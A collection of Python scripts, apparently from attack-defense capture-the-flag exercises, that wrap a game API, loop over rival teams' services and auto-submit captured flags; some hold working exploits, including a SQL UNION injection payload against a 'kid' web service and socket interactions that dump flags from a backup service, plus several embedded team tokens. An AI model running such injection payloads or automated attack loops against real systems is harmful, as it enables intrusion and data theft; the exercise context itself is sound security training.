class PCTFAPI(): __slots__ = ('team') def __init__(self, game_url, team_token): self.team = Team(game_url, team_token) def getServiceNames(self): service_ids = [] services = self.team.get_service_list() for service in services: service_ids.append(service['service_id']) return service_ids def getTargets(self, service): targets = self.team.get_targets(service) return targets def getFLG(self, hostname, flagID): kid_url = 'http://' + hostname + ':10003/kid' print('Send request to: ' + kid_url) sql_injection = "%' UNION SELECT description AS data from parties where id=" + flagID + "; --" payload = {'first': 'Hong', 'last': sql_injection, 'age': 30} try: r = requests.get(kid_url, params=payload) res = r.text kid_id = res.split()[2] print(res) print(kid_id) find_url = 'http://' + hostname + ':10003/find' print('Send request to: ' + find_url) find_params = {'kid': kid_id} find_r = requests.get(find_url, params=find_params) find_res = find_r.text flag = find_res.split()[5] print(find_res) print(flag) return flag except: return None def submitFlag(self, flags): if not isinstance(flags, list): flags = [flags] status = self.team.submit_flag(flags) for i, s in enumerate(status): print("Flag %s submission status: %s" % (flags[i], s)) return status
class PCTFAPI(): __slots__ = ('team') def __init__(self, game_url, team_token): self.team = Team(game_url, team_token) def getServiceNames(self): service_ids = [] services = self.team.get_service_list() for service in services: service_ids.append(service['service_id']) return service_ids def getTargets(self, service): targets = self.team.get_targets(service) return targets def getFlag(self): #TODO: implement the getFlag logic. flag = 'dummy flag' return flag def submitFlag(self, flags): if not isinstance(flags, list): flags = [flags] status = self.team.submit_flag(flags) for i, s in enumerate(status): print("Flag %s submission status: %s" % (flags[i], s)) return status
from swpag_client import Team t = Team("http://actf0.cse545.rev.fish/", "IeaL1xdIryga0Ubazn2Zi2Sh3Gf47RdN") print(t.game_url) #print(t.get_vm()) print(t.get_game_status()) print(t.get_service_list()) #t.get_targets(service_id) services = t.get_service_list() print('services:', services) print() for service in services: print('SERVICE NAME:', service) targets = t.get_targets(service_id) for target in targets: print('TARGET NAME:', target)
def attack_svc7(flag_id): print("running attack on service 7, flag id:", flag_id) flag = "" return flag # NOTE: update this whitelist for the attack functions above. # So we don't waste time executing stuff that's not done. implemented_attack_functions = {2} attack_functions = [ None, attack_svc1, attack_svc2, attack_svc3, attack_svc4, attack_svc5, attack_svc6, attack_svc7 ] team = Team("http://52.53.64.114", "C3U6ooCuCLGoTgzOqoO3") services = team.get_service_list() service_flag_ids = dict() while True: for service in services: if service['service_id'] not in implemented_attack_functions: print("skipping service", service['service_id'], ", attack function not implemented") continue print("Going to attack", service['service_name']) if service['service_name'] not in service_flag_ids: service_flag_ids[service['service_name']] = set() targets = team.get_targets(service['service_id']) for target in targets: if not target["team_name"].startswith("fos_"): continue
class ProjectCTFAPI(): # This is just a simple wrapper class # See client.py for more methods supported by self.team __slots__ = ('team', 'debug') """ The Team class is your entrypoint into the API """ def __init__(self, gameIp, teamToken): self.debug = False self.team = Team(gameIp, teamToken) """ This returns all of the service ids in the game """ def getServices(self): ids = [] services = self.team.get_service_list() if self.debug: print("~" * 5 + " Service List " + "~" * 5) for s in services: ids.append(s['service_id']) if self.debug: print("Service %s: %s\n\t'%s'" % (s['service_id'], s['service_name'], s['description'])) return ids """ This returns a list of targets (ports, ips, flag ids) for the given service id """ def getTargets(self, service): targets = self.team.get_targets(service) if self.debug: print("~" * 5 + " Targets for service %s " % service + "~" * 5) for t in targets: for key in ['hostname', 'port', 'flag_id', 'team_name']: print("%10s : %s" % (key, t[key])) print("\n") return targets """ Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...] """ def submitFlag(self, oneOrMoreFlags): if not isinstance(oneOrMoreFlags, list): oneOrMoreFlags = [oneOrMoreFlags] status = self.team.submit_flag(oneOrMoreFlags) if self.debug: for i, s in enumerate(status): print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s)) return status
from swpag_client import Team import sys from time import sleep import subprocess TICK = 30 MAX_SIZE = 100 exploit = sys.argv[2] service = sys.argv[1] t = Team("http://teaminterface.ictf.love/", "g7iCTu9Gt6pj1DCG4XwP") services = t.get_service_list() print(services) if service not in services: raise Exception("Check service name") while True: targets = ["diocane"] targets = t.get_targets(service) for target in targets: flags = subprocess.check_output([exploit, target]).decode("utf-8").split("\n") if len(flags) > MAX_SIZE: list_of_flags = [flags[:MAX_SIZE], flags[MAX_SIZE:]] else: list_of_flags = [flags] print(list_of_flags) for max_flags in list_of_flags: t.submit_flags(max_flags)
class PCTFAPI(): __slots__ = ('team') def __init__(self, game_url, team_token): self.team = Team(game_url, team_token) def getServiceNames(self): service_ids = [] services = self.team.get_service_list() for service in services: service_ids.append(service['service_id']) return service_ids def getTargets(self, service): targets = self.team.get_targets(service) return targets def getFLG(self, hostname, flagID): try: r = remote(hostname, 10001) except: print(hostname + ' is down ') return None r.sendline('2') r.sendline(flagID) r.sendline('*') rl = r.recvall(timeout=1) decoded_str = '' try: decoded_str = rl.decode('utf-8') print(decoded_str) except: print('bad response') return None m = re.search('FLG[0-9A-Za-z]{13}', decoded_str) if m == None: r.close() return None FLG = m.group(0) print('captured the flag') print(FLG) r.close() return FLG def submitFlag(self, flags): if not isinstance(flags, list): flags = [flags] status = self.team.submit_flag(flags) for i, s in enumerate(status): print("Flag %s submission status: %s" % (flags[i], s)) return status
from swpag_client import Team from pprint import pprint t = Team("http://api.ictf2019.net/", "lVTU84h3IsWsv5Qa48Wv") pprint(t.get_service_list()) with open('services.txt', 'w') as fout: pprint(t.get_service_list(), fout)
class ProjectCTFAPI(): # This is just a simple wrapper class # See client.py for more methods supported by self.team __slots__ = ('team', 'debug') """ The Team class is your entrypoint into the API """ def __init__(self, gameIp, teamToken): self.debug = False self.team = Team(gameIp, teamToken) """ This returns all of the service ids in the game """ def getServices(self): ids = [] services = self.team.get_service_list() if self.debug: print("~" * 5 + " Service List " + "~" * 5) for s in services: ids.append(s['service_id']) if self.debug: print("Service %s: %s\n\t'%s'" % (s['service_id'], s['service_name'], s['description'])) return ids """ This returns a list of targets (ports, ips, flag ids) for the given service id """ def getTargets(self, service): targets = self.team.get_targets(service) if self.debug: print("~" * 5 + " Targets for service %s " % service + "~" * 5) for t in targets: for key in ['hostname', 'port', 'flag_id', 'team_name']: print("%10s : %s" % (key, t[key])) print("\n") return targets """ Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...] """ def submitFlag(self, oneOrMoreFlags): if not isinstance(oneOrMoreFlags, list): oneOrMoreFlags = [oneOrMoreFlags] status = self.team.submit_flag(oneOrMoreFlags) if self.debug: for i, s in enumerate(status): print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s)) return status def getFLG(self, hostname, flagID): # Please change port id accordingly r = remote(hostname, 20003) #below is the exploit of Backup service of CTF3 # Please change the exploit interaction accordingly r.sendline('2') r.sendline(flagID) r.sendline('*') # Receive data from victim service # Use python regular expression to search flag rl = r.recvall(timeout=1) m = re.search('FLG[0-9A-Za-z]{13}', rl) # If no flag (service is patched), then close the remote connection and return none if m == None: r.close() return None # If find flag, print it, close the connection and send the flag back to main. FLG = m.group(0) print FLG r.close() return FLG